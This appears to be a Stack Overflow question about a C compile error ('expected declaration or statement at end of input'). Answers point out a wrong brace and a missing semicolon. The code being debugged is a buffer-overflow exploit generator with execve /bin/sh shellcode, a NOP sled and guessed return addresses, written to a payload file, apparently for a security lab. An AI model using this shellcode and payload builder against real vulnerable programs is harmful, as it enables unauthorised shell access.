# simple error: expected declaration or statement at end of input

Tags: c

When I try to compile the following code I keep getting an error: expected declaration or statement at end of input.  I realize this is usually because a bracket was missed but I can't seem to find it.  I'm hoping another pair of eyes can spot the error I've been staring at it for some time now.

```
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define DEFAULT_OFFSET 350 

char shellcode[]=
"\x31\xc0"              /* xorl    %eax,%eax              */
"\x50"                  /* pushl   %eax                   */
"\x68""//sh"            /* pushl   $0x68732f2f            */
"\x68""/bin"            /* pushl   $0x6e69622f            */
"\x89\xe3"              /* movl    %esp,%ebx              */
"\x50"                  /* pushl   %eax                   */
"\x53"                  /* pushl   %ebx                   */
"\x89\xe1"              /* movl    %esp,%ecx              */
"\x99"                  /* cdql                           */
"\xb0\x0b"              /* movb    $0x0b,%al              */    
"\xcd\x80"              /* int     $0x80                  */

unsigned long get_sp(void)
{
    __asm__("movl %esp,%eax");
}

void main(int argc, char **argv)
{
    char buffer[517];
    FILE *badfile;
    char *ptr;
    long *a_ptr,ret;

    int offset = DEFAULT_OFFSET;
    int codeSize = sizeof(shellcode);
    int buffSize = sizeof(buffer);

    if(argc > 1) offset = atoi(argv[1]); //allows for command line input

    ptr=buffer;
    a_ptr = (long *) ptr;

    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(buffer, 0x90, buffSize);

    ret = get_sp()+offset;
    printf("Return Address: 0x%x\n",get_sp());
    printf("Address: 0x%x\n",ret);

    ptr = buffer;
    a_ptr = (long *) ptr;

    int i;
    for (i = 0; i < 300;i+=4)
    {
        *(a_ptr++) = ret;
    }

    for(i = 486;i < codeSize + 486;++i)
    {
        buffer[i] = shellcode[i-486];
    {
    buffer[buffSize - 1] = '\0';    

/* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    fwrite(buffer,517,1,badfile);
    fclose(badfile);    
}
```

Comment: I assume the compiler didn't print the line on which the error happened...

Comment: Doesn't your compiler shows you file and line where error detected? See clang example [here](http://coliru.stacked-crooked.com/a/5eba191623bae71b)

Comment: I think those shellcode strings are all going to be concatenated together. Is that what you wanted?

Comment: It just said line 70 which is the last line

Comment: What compiler you use?

Comment: Get better eyes, get a better IDE or editor that highlights matching braces, get a better compiler that identifies which brace wasn't matched, get a better sense of what an appropriate SO question is, and learn to count.

Comment: A tough, but fair, comment. A "better IDE" could be one whcih includes code folding, which can make it easier to spot missing braces than simply finding the matching brace in large section sof code

Answer (score 7, accepted):

Problem is in this snippet

```
for(i = 486;i < codeSize + 486;++i)
{
    buffer[i] = shellcode[i-486];
{                                 // Here is the problem
buffer[buffSize - 1] = '\0';
```

Change last `{` to `}`.

Comment: oh yeah, this is one too. Toooooo many typos in this much code.

Comment: @H2CO3; Yes, true. But not more than [this](http://stackoverflow.com/q/18856124/2455888). I answered this last night and fixed some of them.

Comment: @H2CO3; That was horrible :)

Answer (score 3):

You forgot the terminating semicolon after the initialization of your `shellcode` array.

Answer (score 2):

This solution not directly answers the question, sorry. But it is much better =)

Ok, solution is to use an IDE. See:

- [Best C++ IDE or Editor for Windows](https://stackoverflow.com/questions/89275/best-c-ide-or-editor-for-windows)
- [C++ IDE for Linux?](https://stackoverflow.com/questions/24109/c-ide-for-linux)

(obviously, most C++ IDEs supports C)

Just try out some of them, pick your favorite, and you will never need to ask SO-guys to fix syntax errors (they quickly go mad of this).

My fav is Visual Studio + Visual Assist, no any IDE even close, regarding to code typing. But it is windows only and crappy cl.exe or Intel compiler =((

For linux, KDevelop has the best code typing helpers among all linux IDEs, in my opinion.

Happy coding!

Comment: Just run it through gnu `indent`.  The formatting will tell you what you need to know.